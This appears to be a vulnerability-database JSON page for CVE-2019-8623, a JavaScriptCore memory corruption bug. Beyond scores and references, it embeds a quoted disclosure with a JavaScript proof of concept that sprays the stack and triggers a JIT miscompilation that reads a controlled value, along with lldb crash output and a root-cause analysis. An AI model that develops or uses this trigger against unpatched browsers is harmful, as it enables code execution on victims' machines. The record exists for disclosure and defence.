DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2019-8623", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2019-8623", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.", "published": "2019-12-18T18:15:00", "modified": "2020-08-24T17:37:00", "epss": [{"cve": "CVE-2019-8623", "epss": 0.08182, "percentile": 0.93663, "modified": "2023-12-03"}], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8623", "reporter": "product-security@apple.com", "references": ["https://support.apple.com/HT210118", "https://support.apple.com/HT210119", "https://support.apple.com/HT210122", "https://support.apple.com/HT210123", "https://support.apple.com/HT210124", "https://support.apple.com/HT210212", "https://support.apple.com/HT210125", "https://support.apple.com/HT210120"], "cvelist": ["CVE-2019-8623"], "immutableFields": [], "lastseen": "2023-12-03T15:48:11", "viewCount": 164, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS2-2020-1563"]}, {"type": "apple", "idList": ["APPLE:0B002AB816638E74B596AA40B55E1D50", "APPLE:44EB82A038A5905A4FF1CA22BF548D8A", "APPLE:4818844A5404FC371177D5D6FC37AAF6", "APPLE:58882F88115CDA41ED601C84EE09383E", "APPLE:76B82742C66B190465E1377BEA4E4838", "APPLE:8C5416054DEFC022B2CEE91325E63CED", "APPLE:902B102D254893DE7086BCC292F98025", "APPLE:F140693073F19FD842C6915DBBBD6D8D", "APPLE:HT210118", "APPLE:HT210119", "APPLE:HT210120", "APPLE:HT210122", "APPLE:HT210123", "APPLE:HT210124", "APPLE:HT210125", "APPLE:HT210212"]}, {"type": "centos", "idList": ["CESA-2020:4035"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-8623"]}, {"type": "freebsd", "idList": ["3DD46E05-9FB0-11E9-BF65-00012E582166"]}, {"type": "kaspersky", "idList": ["KLA11489", "KLA11490"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "nessus", "idList": ["700666.PRM", "700667.PRM", "700713.PRM", "700719.PRM", "AL2_ALAS-2020-1563.NASL", "ALMA_LINUX_ALSA-2019-3553.NASL", "APPLETV_12_3.NASL", "APPLE_IOS_123_CHECK.NBIN", "CENTOS8_RHSA-2019-3553.NASL", "CENTOS_RHSA-2020-4035.NASL", "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "ICLOUD_7_12.NASL", "ITUNES_12_9_5.NASL", "ITUNES_12_9_5_BANNER.NASL", "MACOSX_SAFARI_12_1_1.NASL", "MACOSX_SECUPD2019-003.NASL", "MACOS_10_14_5.NASL", "NEWSTART_CGSL_NS-SA-2021-0041_WEBKITGTK4.NASL", "NEWSTART_CGSL_NS-SA-2021-0166_WEBKITGTK4.NASL", "OPENSUSE-2019-1766.NASL", "ORACLELINUX_ELSA-2020-4035.NASL", "REDHAT-RHSA-2020-4035.NASL", "ROCKY_LINUX_RLSA-2019-3553.NASL", "SL_20201001_WEBKITGTK4_ON_SL7_X.NASL", "SUSE_SU-2019-1850-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814887", "OPENVAS:1361412562310814892", "OPENVAS:1361412562310815218", "OPENVAS:1361412562310852626"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4035"]}, {"type": "prion", "idList": ["PRION:CVE-2019-8623"]}, {"type": "redhat", "idList": ["RHSA-2019:3553", "RHSA-2020:4035", "RHSA-2020:4298"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-8623"]}, {"type": "rocky", "idList": ["RLSA-2019:3553"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1766-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-8623"]}, {"type": "veracode", "idList": ["VERACODE:27377"]}, {"type": "zdt", "idList": ["1337DAY-ID-32759"]}]}, "score": {"value": 8.9, "uncertanity": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS2-2020-1563"]}, {"type": "apple", "idList": ["APPLE:0B002AB816638E74B596AA40B55E1D50", "APPLE:44EB82A038A5905A4FF1CA22BF548D8A", "APPLE:4818844A5404FC371177D5D6FC37AAF6", "APPLE:58882F88115CDA41ED601C84EE09383E", "APPLE:76B82742C66B190465E1377BEA4E4838", "APPLE:8C5416054DEFC022B2CEE91325E63CED", "APPLE:902B102D254893DE7086BCC292F98025", "APPLE:F140693073F19FD842C6915DBBBD6D8D", "APPLE:HT210118", "APPLE:HT210119", "APPLE:HT210120", "APPLE:HT210122", "APPLE:HT210123", "APPLE:HT210124", "APPLE:HT210125", "APPLE:HT210212"]}, {"type": "centos", "idList": ["CESA-2020:4035"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-8623"]}, {"type": "freebsd", "idList": ["3DD46E05-9FB0-11E9-BF65-00012E582166"]}, {"type": "kaspersky", "idList": ["KLA11489", "KLA11490"]}, {"type": "kitploit", "idList": ["KITPLOIT:8766743662298222785"]}, {"type": "nessus", "idList": ["AL2_ALAS-2020-1563.NASL", "APPLETV_12_3.NASL", "CENTOS_RHSA-2020-4035.NASL", "FREEBSD_PKG_3DD46E059FB011E9BF6500012E582166.NASL", "ICLOUD_7_12.NASL", "ITUNES_12_9_5.NASL", "MACOSX_SAFARI_12_1_1.NASL", "MACOSX_SECUPD2019-003.NASL", "MACOS_10_14_5.NASL", "ORACLELINUX_ELSA-2020-4035.NASL", "REDHAT-RHSA-2020-4035.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814887", "OPENVAS:1361412562310814892", "OPENVAS:1361412562310815218", "OPENVAS:1361412562310852626"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4035"]}, {"type": "redhat", "idList": ["RHSA-2020:4298"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-8623"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1766-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-8623"]}, {"type": "zdt", "idList": ["1337DAY-ID-32759"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "apple icloud", "version": 7}, {"name": "apple icloud", "version": 10}, {"name": "apple itunes", "version": 12}, {"name": "apple safari", "version": 12}, {"name": "apple iphone os", "version": 12}, {"name": "apple mac os x", "version": 10}, {"name": "apple tvos", "version": 12}, {"name": "apple watchos", "version": 5}]}, "epss": [{"cve": "CVE-2019-8623", "epss": 0.06766, "percentile": 0.92804, "modified": "2023-05-06"}], "short_description": "Multiple memory corruption issues fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12", "tags": ["cve-2019-8623", "memory corruption", "ios", "macos", "tvos", "watchos", "safari", "itunes", "icloud", "arbitrary code execution"], "vulnersScore": 8.9}, "_state": {"dependencies": 1701618697, "score": 1701618842, "affected_software_major_version": 0, "epss": 0, "chatgpt": 0}, "_internal": {"score_hash": "b022180887030c453163cd7d6cff35b2", "chatgpt": "bcd8b0c2eb1fce714eab6cef0d771acc"}, "cna_cvss": {"cna": "apple", "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-787"], "affectedSoftware": [{"cpeName": "apple:icloud", "version": "7.12", "operator": "lt", "name": "apple icloud"}, {"cpeName": "apple:itunes", "version": "12.9.5", "operator": "lt", "name": "apple itunes"}, {"cpeName": "apple:safari", "version": "12.1.1", "operator": "lt", "name": "apple safari"}, {"cpeName": "apple:iphone_os", "version": "12.3", "operator": "lt", "name": "apple iphone os"}, {"cpeName": "apple:tvos", "version": "12.3", "operator": "lt", "name": "apple tvos"}, {"cpeName": "apple:mac_os_x", "version": "10.14.5", "operator": "lt", "name": "apple mac os x"}, {"cpeName": "apple:watchos", "version": "5.2.1", "operator": "lt", "name": "apple watchos"}, {"cpeName": "apple:icloud", "version": "10.4", "operator": "lt", "name": "apple icloud"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apple:icloud:7.12:*:*:*:*:windows:*:*", "versionEndExcluding": "7.12", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apple:itunes:12.9.5:*:*:*:*:windows:*:*", "versionEndExcluding": "12.9.5", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apple:safari:12.1.1:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.1", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:apple:iphone_os:12.3:*:*:*:*:*:*:*", "versionEndExcluding": "12.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:apple:tvos:12.3:*:*:*:*:*:*:*", "versionEndExcluding": "12.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.14.5:*:*:*:*:*:*:*", "versionEndExcluding": "10.14.5", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:apple:watchos:5.2.1:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.1", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apple:icloud:10.4:*:*:*:*:windows:*:*", "versionStartIncluding": "10.0", "versionEndExcluding": "10.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://support.apple.com/HT210118", "name": "https://support.apple.com/HT210118", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210119", "name": "https://support.apple.com/HT210119", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210122", "name": "https://support.apple.com/HT210122", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210123", "name": "https://support.apple.com/HT210123", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210124", "name": "https://support.apple.com/HT210124", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210212", "name": "https://support.apple.com/HT210212", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210125", "name": "https://support.apple.com/HT210125", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/HT210120", "name": "https://support.apple.com/HT210120", "refsource": "MISC", "tags": ["Vendor Advisory"]}], "product_info": [{"vendor": "Apple", "product": "iOS"}, {"vendor": "Apple", "product": "iTunes for Windows"}, {"vendor": "Apple", "product": "iCloud for Windows"}, {"vendor": "Apple", "product": "Safari"}, {"vendor": "Apple", "product": "watchOS"}, {"vendor": "Apple", "product": "tvOS"}, {"vendor": "Apple", "product": "macOS"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"description": "Processing maliciously crafted web content may lead to arbitrary code execution", "lang": "en", "type": "text"}]}], "exploits": [], "assigned": "2019-02-18T00:00:00"}

{"veracode": [{"lastseen": "2022-07-26T16:26:05", "description": "WebKitGTK+ is vulnerable to arbitrary code execution. Processing maliciously crafted web content may lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-01T03:52:35", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2022-04-19T18:45:49", "id": "VERACODE:27377", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27377/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-12-03T18:31:19", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "debiancve", "title": "CVE-2019-8623", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2019-12-18T18:15:00", "id": "DEBIANCVE:CVE-2019-8623", "href": "https://security-tracker.debian.org/tracker/CVE-2019-8623", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-03T14:10:10", "description": "Multiple memory corruption issues were addressed with improved memory\nhandling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3,\nwatchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows\n7.12. Processing maliciously crafted web content may lead to arbitrary code\nexecution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "ubuntucve", "title": "CVE-2019-8623", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2019-12-18T00:00:00", "id": "UB:CVE-2019-8623", "href": "https://ubuntu.com/security/CVE-2019-8623", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-12-02T11:54:00", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-09-08T18:49:14", "type": "redhatcve", "title": "CVE-2019-8623", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2023-08-31T15:52:24", "id": "RH:CVE-2019-8623", "href": "https://access.redhat.com/security/cve/cve-2019-8623", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:21:14", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2020-08-24T17:37:00", "id": "PRION:CVE-2019-8623", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-8623", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-12-03T19:09:59", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-05-21T00:00:00", "type": "zdt", "title": "macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8623"], "modified": "2019-05-21T00:00:00", "id": "1337DAY-ID-32759", "href": "https://0day.today/exploit/description/32759", "sourceData": "macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized\n\nWhile fuzzing JavaScriptCore, I encountered the following (modified and commented) JavaScript program which crashes jsc from current HEAD and release:\n\n // Run with --useConcurrentJIT=false\n\n // Fill the stack with the return value of the provided function.\n function stackspray(f) {\n // This function will spill all the local variables to the stack\n // since they are needed for the returned array.\n let v0 = f(); let v1 = f(); let v2 = f(); let v3 = f();\n let v4 = f(); let v5 = f(); let v6 = f(); let v7 = f();\n return [v0, v1, v2, v3, v4, v5, v6, v7];\n }\n // JIT compile the stack spray.\n for (let i = 0; i < 1000; i++) {\n // call twice in different ways to prevent inlining.\n stackspray(() => 13.37);\n stackspray(() => {});\n }\n\n for (let v15 = 0; v15 < 100; v15++) {\n function v19(v23) {\n // This weird loop form might be required to prevent loop unrolling...\n for (let v30 = 0; v30 < 3; v30 = v30 + \"asdf\") {\n // Generates the specific CFG necessary to trigger the bug.\n const v33 = Error != Error;\n if (v33) {\n } else {\n // Force a bailout.\n // CFA will stop here and thus mark the following code as unreachable.\n // Then, LICM will ignore the memory writes (e.g. initialization of stack slots)\n // performed by the following code and will then move the memory reads (e.g.\n // access to stack slots) above the loop, where they will, in fact, be executed.\n const v34 = (1337)[-12345];\n }\n\n function v38(v41) {\n // v41 is 8 bytes of uninitialized stack memory here, as\n // (parts of) this code get moved before the loop as well.\n return v41.hax = 42;\n }\n for (let v50 = 0; v50 < 10000; v50++) {\n let o = {hax: 42};\n const v51 = v38(o, ...arguments);\n }\n }\n // Force FTL compilation, probably.\n for (let v53 = 0; v53 < 1000000; v53++) {\n }\n }\n\n // Put controlled data onto the stack.\n stackspray(() => 3.54484805889626e-310); // 0x414141414141 in binary\n // Call the miscompiled function.\n const v55 = v19(1337);\n }\n\n\nThis yields a crash similar to the following:\n\n# lldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc --useConcurrentJIT=false current.js\n(lldb) target create \"/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc\"\nCurrent executable set to '/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc' (x86_64).\n(lldb) settings set -- target.run-args \"--useConcurrentJIT=false\" \"current.js\"\n(lldb) r\nProcess 45483 launched: '/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc' (x86_64)\nProcess 45483 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)\n frame #0: 0x000025c3ca81306e\n-> 0x25c3ca81306e: cmp dword ptr [rax], 0x127\n 0x25c3ca813074: jne 0x25c3ca81316f\n 0x25c3ca81307a: mov dword ptr [rbp + 0x24], 0x1\n 0x25c3ca813081: movabs rax, 0x7fff3c932a70\nTarget 0: (jsc) stopped.\n(lldb) reg read rax\n rax = 0x0001414141414141 // Note the additional 0x1 at the start due to the NaN boxing scheme (see JSCJSValue.h)\n\nThe same sample also sometimes triggers a crash with --useConcurrentJIT=true (the default), but it is more reliable with concurrent JIT disabled.\nIf the sprayed value is a valid pointer, that pointer would either be treated as an object with the structure of `o` in the following code (if the first dword matches the structure ID), or it would be treated as a JSValue after a bailout to the baseline JIT/interpreter.\n\n\nIt appears that what is happening here is roughly the following:\n\nWhen v19 is JIT compiled in the DFG, it emits the following (shortened and simplified) DFG IR for the body of the loop:\n\n # BASIC BLOCK #9 (loop body)\n # Create object `o`\n 110: NewObject()\n 116: PutByOffset(@110, @113, id1{hax})\n 117: PutStructure(@110, ID:430)\n\n # Spread `o` and `arguments` into a new array and use that for a varargs call\n 131: Spread(@30)\n 134: NewArrayWithSpread(@110, @131)\n 142: LoadVarargs(@134, R:World, W:Stack(-26),Stack(-24),Stack(-23),Stack(-22),Heap)\n\n # Inlined call to v38, load the first argument from the stack (where LoadVarargs put it)\n 8: GetStack(R:Stack(-24))\n 177: CheckStructure(@8)\n 178: PutByOffset(@8, @113, id1{hax})\n ...\n\nDuring loop-invariant code motion (LICM), the GetStack operation, reading from the stack slot initialized by the LoadVarargs operation, is moved in front of the loop (together with parts of the inlined v38 function), thus yielding:\n\n # BASIC BLOCK #2 (before loop header)\n 8: GetStack(R:Stack(-24))\n 177: CheckStructure(@8)\n\n\n # BASIC BLOCK #9 (loop body)\n # Create object `o`\n ...\n\n # Spread `o` and `arguments` into a new array and use that for a varargs call\n ...\n 142: LoadVarargs(@134, R:World, W:Stack(-26),Stack(-24),Stack(-23),Stack(-22),Heap)\n ...\n\nAs such, in the resulting machine code, the value for v41 (the argument for the inner function) will be loaded from an uninitialized stack slot (which is only initialized later on in the code).\n\nNormally, this shouldn't happen as the LoadVarargs operations writes into the stack (W:Stack(-24)), and GetStack reads from that (R:Stack(-24)). Quoting from DFGLICMPhase.cpp: \"Hoisting is valid if: ... The node doesn't read anything that the loop writes.\". As such, GetStack should not have been moved in front of the loop.\n\nThe reason that it was still moved appears to be a logical issue in the way LICM deals with dead code: LICM relies on the data computed by control flow analysis (CFA) to know whether a block will be executed at all. If a block will never be executed (and so is dead code), then LICM does not take into account memory writes (e.g. to Stack(-24)) performed by any operation in this block (See https://github.com/WebKit/webkit/blob/c755a5c371370d3a26f2dbfe0eea1b94f2f0c38b/Source/JavaScriptCore/dfg/DFGLICMPhase.cpp#L88). It appears that this behaviour is incorrect, as in this case, CFA correctly concludes that block #9 is dead code (see below). As such, LICM doesn't \"see\" the memory writes and incorrectly moves the GetStack operation (reading from a stack slot) in front of the LoadVarargs operation (initializing that stack slot).\n\nTo understand why CFA computes that the loop body (block #9) is unreachable, it is necessary to take a look at the (simplified) control flow graph for v9, which can be found in the attachment (as it needs to be rendered in monospace font :)). In the CFG, block #3, corresponding to the `if`, is marked as always taking the false branch (which is correct), and thus jumping to block 5. Block 5 then contains a ForceOSRExit operation due to the out-of-bounds array access, which the JIT doesn't optimize for. As this operation terminates execution in the DFG, CFA also stops here and never visits the rest of the loop body and in particular never visits block #9.\n\n\nTo recap: in the provided JavaScript program, CFA correctly computes that basic block #9 is never executed. Afterwards, LICM decides, based on that data, to ignore memory writes performed in block #9 (dead code), then moves memory reads from block #9 (dead code) into block #2 (alive code). The code is then unsafe to execute. It is likely that this misbehaviour could lead to other kinds of memory corruption at runtime.\n\n\n +-----+\n | 0 +----+\n +-----+ |\n+-----+ |\n| 1 +-------+ v\n+-----+ | +-----------+\n ^ | | 2 |\n | +---->| loop head |\n | +-----+-----+\n | |\n | v\n | +---------+\n | | 3 |\n | | if head |\n | +--+---+--+\n | | |\n | +-----+ | | +-----+\n | | 5 |<-----+ +----->| 4 |\n | +--+--+ +--+--+\n | OSRExit here |\n | +-----+ |\n | | 6 |<-------+\n | +--+--+\n | +------+ |\n +-------+ 7-10 |<------+\n +---+--+\n Rest of | Loop body\n |\n | To End of function\n", "sourceHref": "https://0day.today/exploit/32759", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-04-18T12:41:53", "description": "An update that fixes 20 vulnerabilities is now available.\n\nDescription:\n\n This update for webkit2gtk3 to version 2.24.2 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584,\n CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n 